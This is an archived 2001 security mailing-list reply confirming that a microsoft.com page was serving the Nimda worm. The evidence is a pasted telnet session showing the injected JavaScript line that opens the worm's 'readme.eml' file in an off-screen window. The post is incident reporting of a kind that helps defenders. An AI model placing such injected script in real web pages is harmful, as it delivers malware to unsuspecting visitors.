Security Incidents mailing list archives
Re: Please tell me I'm wrong: microsoft.com infected
From: "Jay D. Dyson" <jdyson () treachery net>
Date: Wed, 19 Sep 2001 15:02:43 -0700 (PDT)
-----BEGIN PGP SIGNED MESSAGE----- On Wed, 19 Sep 2001, Steve Cody wrote:
I just went to http://www.microsoft.com/frontpage, and my Symantec Norton Antivirus popped up and denied access to readme.eml. I could not view the source of the loaded page, so I can't verify that it is definitely infected.
Your worst fears have now been confirmed. sasumata$ telnet www.microsoft.com 80 Trying 207.46.197.100... Connected to www.microsoft.akadns.net. Escape character is '^]'. GET /frontpage/ HTTP/1.0 <snip> <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> Microsoft's site has been compromised by Nimda. There is no disputing it now. - -Jay ( ( _______ )) )) .--"There's always time for a good cup of coffee"--. >====<--. C|~~|C|~~| (>------ Jay D. Dyson -- jdyson () treachery net ------<) | = |-' `--' `--' `-- What doesn't kill us only makes us stronger. --' `------' -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: See http://www.treachery.net/~jdyson/ for current keys. iQCVAwUBO6kH9rlDRyqRQ2a9AQESugP8C6RIIUmkcV/e6ifRNqz067ER5PSizDDA APzdpR1DO1Q9N5lMEtUagEshgDSYiGKUBU+5vesKZ7TWCjad4iuY8ME0oe4yZxjv acSX3Tqo0b+sQtJ5VF1IYSljqSbZ+EvYYDUUF8PEmQdkyCp2u/J8HX+duykaisvc 5CjLcnLK5U8= =DIF4 -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Please tell me I'm wrong: microsoft.com infected Steve Cody (Sep 19)
- Re: Please tell me I'm wrong: microsoft.com infected Rodrigo Goya (Sep 19)
- Re: Please tell me I'm wrong: microsoft.com infected Nick FitzGerald (Sep 19)
- Re: Please tell me I'm wrong: microsoft.com infected Johannes Verelst (Sep 19)
- Re: Please tell me I'm wrong: microsoft.com infected Nick FitzGerald (Sep 19)
- Re: Please tell me I'm wrong: microsoft.com infected Benjamin Franz (Sep 19)
- RE: Please tell me I'm wrong: microsoft.com infected Brian Morin (Sep 19)
- Re: Please tell me I'm wrong: microsoft.com infected Michael H. Warfield (Sep 19)
- Re: Please tell me I'm wrong: microsoft.com infected Jay D. Dyson (Sep 19)
- Re: Please tell me I'm wrong: microsoft.com infected Jon Zobrist (Sep 19)
- <Possible follow-ups>
- RE: Please tell me I'm wrong: microsoft.com infected jmiller (Sep 19)
- Re: Please tell me I'm wrong: microsoft.com infected Rodrigo Goya (Sep 19)
- RE: Please tell me I'm wrong: microsoft.com infected Ken Pfeil (Sep 19)
- RE: Please tell me I'm wrong: microsoft.com infected jmiller (Sep 19)
- RE: Please tell me I'm wrong: microsoft.com infected Craig Humphrey (Sep 19)
- RE: Please tell me I'm wrong: microsoft.com infected Boyan Krosnov (Sep 19)
- RE: Please tell me I'm wrong: microsoft.com infected Dave Hart (Sep 19)
- RE: Please tell me I'm wrong: microsoft.com infected David LeBlanc (Sep 19)
- Re: Please tell me I'm wrong: microsoft.com infected Rodrigo Goya (Sep 19)